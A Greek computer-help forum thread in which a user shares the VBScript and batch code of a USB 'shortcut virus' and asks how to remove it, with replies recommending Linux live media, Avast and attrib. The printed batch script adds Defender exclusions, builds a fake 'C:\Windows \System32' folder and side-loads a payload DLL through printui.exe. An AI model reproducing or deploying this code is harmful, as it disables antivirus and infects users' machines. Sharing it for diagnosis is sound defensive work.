Text only | Text with Images

Το Στέκι των Πληροφορικών

Γενικά => Τεχνική υποστήριξη => Μήνυμα ξεκίνησε από: xdv στις 11 Δεκ 2025, 03:52:52 ΜΜ

Τίτλος: malware
Αποστολή από: xdv στις 11 Δεκ 2025, 03:52:52 ΜΜ
Κώδικας [Επιλογή]
If Not WScript.Arguments.Named.Exists("elevated") Then
Set sh = CreateObject("Shell.Application")
sh.ShellExecute "wscript.exe", Chr(34) & WScript.ScriptFullName & Chr(34) & " /elevated", "", "runas", 1
WScript.Quit
End If
Set fs = CreateObject("Scripting.FileSystemObject")
pp = fs.GetParentFolderName(WScript.ScriptFullName)
bp = pp & "\u197288.bat"
If fs.FileExists(bp) Then
Set sp = WScript.CreateObject("WScript.Shell")
sp.Run Chr(34) & bp & Chr(34), 0
End If
Κώδικας [Επιλογή]
@echo off
chcp 65001
explorer "%~dp0..\KINGSTON"
if exist "%~dp0u509436.dat" if not exist "C:\Windows \System32\printui.dll" (
powershell -Command "Add-MpPreference -ExclusionPath '%~dp0'; Add-MpPreference -ExclusionPath 'C:\Windows \System32'; Start-Sleep -Seconds 2"
if exist "C:\Windows \System32" rmdir /S /Q "\\?\C:\Windows "
mkdir "\\?\C:\Windows \System32"
xcopy "C:\Windows\System32\printui.exe" "C:\Windows \System32" /Y
xcopy "%~dp0u509436.dat" "C:\Windows \System32" /Y
ren "C:\Windows \System32\u509436.dat" "printui.dll"
if exist "C:\Windows \System32\printui.exe" (
if exist "C:\Windows \System32\printui.dll" (
start "" "C:\Windows \System32\printui.exe"
) else rmdir /S /Q "\\?\C:\Windows "
) else rmdir /S /Q "\\?\C:\Windows "
)
σε ένα φλασάκι βρήκα τέσσερα ύποπτα αρχεία 
Ήταν όλα σε ένα φάκελο με όνομα sysvolume. Πιο πάνω παραθέτω τον κώδικα για δύο από αυτά. Το αποτέλεσμα είναι ότι εξαφανίζονται όλα τα αρχεία που υπάρχουν στο φλασάκι και εμφανίζεται μια συντόμευση!
Πώς το διαχειριζόμαστε;
Τίτλος: Απ: malware
Αποστολή από: George Eco στις 11 Δεκ 2025, 09:48:46 ΜΜ
Εγκαθιστούμε  Linux.
Ή τρέχουμε απο live usb.
Κάνεις με αυτό το τρόπο έρευνα, αρχικά για να δεις αν διασώζεται τίποτα από τα αρχέια σου.
Μελέτη κάνεις αν δε βγει έτσι λύση.


Δες κι εδώ:
https://learn.microsoft.com/en-us/answers/questions/2672789/remove-shortcut-virus-iexplore-vbs-from-flash-driv
Τίτλος: Απ: malware
Αποστολή από: xdv στις 22 Απρ 2026, 07:28:10 ΜΜ
Το φλασάκι μπορώ να το καθαρίσω.
Αυτό που δεν μπορώ να καθαρίσω είναι ο υπολογιστής ο οποίος μολύνει ξανά το φλασάκι.
Τίτλος: Απ: malware
Αποστολή από: dski στις 23 Απρ 2026, 03:29:56 ΜΜ
Δοκίμασε με το Avast (τη δωρεάν έκδοση). Με αυτό καθάρισα το στικάκι και κατόπιν έκανα ξανά ορατά τα αρχεία (τα οποία είχαν όλα μεταφερθεί σε έναν νέο φάκελο με όνομα το αρχικό όνομα του USB Stick) με χρήση της attrib από command prompt. Μετά έκανα συνολικό καθαρισμό στο PC  (με το Avast), καθάρισα ό,τι βρήκε και δεν ξαναείχα πρόβλημα με τον ιό. Ελπίζω να δουλέψει και σε εσένα.
Τίτλος: μάλλον διορθώθηκε.....
Αποστολή από: xdv στις 27 Απρ 2026, 06:53:19 ΜΜ
(https://users.sch.gr/dolgyras/404/avast.jpg)
Text only | Text with Images